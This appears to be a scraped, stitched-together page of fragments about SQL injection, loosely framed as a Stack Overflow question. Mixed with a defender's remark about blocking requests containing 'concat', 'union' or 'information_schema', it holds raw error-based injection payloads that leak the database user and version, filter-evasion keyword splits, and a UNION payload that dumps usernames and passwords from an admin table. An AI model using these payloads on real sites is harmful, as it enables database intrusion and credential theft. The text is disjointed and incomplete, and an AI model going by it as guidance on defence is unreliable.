sql - Union to handle NULL values - Stack Overflow ... count(*),concat((select ( select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a SQL injection.
On my site, for instance, it's entirely safe to fail any request with the string 'concat' or '%20union' or 'information_schema'. Indeed, I can even ban any IP that so much as bothers to attempt a request including such strings.
The used SELECT statement, referer: http://site.com/index.php?page=shop.browse&category_id=25&option...
You can clearly see rules containing keywords "select", "union", "all" etc.
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
...UNIunionON+SELselectECT +union+distinct+select+ +union+distinctROW+select+ union+/.
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now; I'll try and update this when I learn more methods of error-based injection.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.